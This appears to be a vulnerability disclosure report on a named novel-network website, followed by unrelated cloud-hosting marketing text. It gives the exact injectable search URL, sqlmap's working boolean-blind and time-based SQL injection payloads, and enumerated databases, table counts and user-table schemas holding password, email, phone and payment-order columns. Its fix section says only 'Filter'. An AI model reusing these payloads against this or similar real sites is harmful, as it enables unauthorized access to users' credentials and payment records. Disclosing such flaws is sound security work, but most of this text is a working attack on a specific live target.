A website under 17k novel network has SQL injection, which can lead to leakage of order information
Http://ssqj.qiye.ikanshu.cn/
Search Area
Packet Capture
Injection Point
http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a*sqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND 8528=8528 AND '%'=' Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND SLEEP(5) AND '%'='---web application technology: JSPback-end DBMS: MySQL 5.0.11Database
web application technology: JSPback-end DBMS: MySQL 5.0.11available databases [19]:[*] ads[*] banquan[*] ca_web_pay[*] cdps[*] client_user_center[*] desay[*] information_schema[*] qiye[*] resource_auth[*] resource_process[*] skymobi_1[*] skymobi_2[*] skymobi_3[*] skymobi_4[*] skymobi_5[*] test[*] wap_17k[*] xinhua[*] zentaotaskCurrent Library
Data Volume
Database: qiye+--------------------+---------+| Table | Entries |+--------------------+---------+| bookchaptercontent | 645223 || bookchapter | 645214 || pv_log | 126977 || qiye_book | 55327 || bookview | 55034 || bookvolume | 46820 || qiye_book_bk | 19146 || book | 7470 || area | 3511 || tmp_id | 3017 || special_book | 2430 || qikan_data | 2119 || `user` | 1836 || doc | 676 || read_history | 527 || data_category | 387 || special_book_1211 | 360 || special_book_bk | 250 || news | 170 || fav_history | 137 || qikan | 79 || zan_history | 77 || activity | 61 || comment | 53 || user_amountlog | 41 || fav_doc_history | 40 || data_authorized | 33 || user_feedback | 32 || feeduser | 29 || bookcategory | 28 || comment_hd | 24 || qiye | 23 || special | 11 || activity_winner | 5 || user_amount | 4 || book_off | 1 |+--------------------+---------+User Field
Database: qiyeTable: user[13 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| create_date | datetime || email | varchar(255) || id | int(11) || info | varchar(255) || last_login_time | datetime || logo | varchar(200) || name | varchar(200) || nick_name | varchar(100) || password | varchar(50) || qiye_id | int(11) || status | smallint(3) || tel | varchar(50) || update_date | datetime |+-----------------+--------------+Cross-Database
Wap_17k
Database: wap_17k+--------------------+---------+| Table | Entries |+--------------------+---------+| bookcomment | 79887 || paylog | 56624 || yeepayorder | 20874 || yeepayresponse | 20212 || useramountlog | 4332 || userbookmark | 3980 || `user` | 3425 || useramount | 3196 || userbookchapterlog | 1291 || feedback | 620 || room_msg | 126 || cmsbook | 53 || cmscategory | 11 || adminuser | 6 |+--------------------+---------+Suspected order information of yeepayorder
Database: wap_17kTable: user[16 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| domain | varchar(50) || age | int(5) || birthDate | date || email | varchar(255) || hobby | varchar(255) || id | int(11) || lastLoginDate | datetime || loginTimes | int(11) || logoImg | varchar(255) || mobile | varchar(20) || nickName | varchar(255) || password | varchar(16) || qq | varchar(30) || regTime | datetime || sex | tinyint(2) || share | tinyint(1) |+---------------+--------------+
Solution:
Filter
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
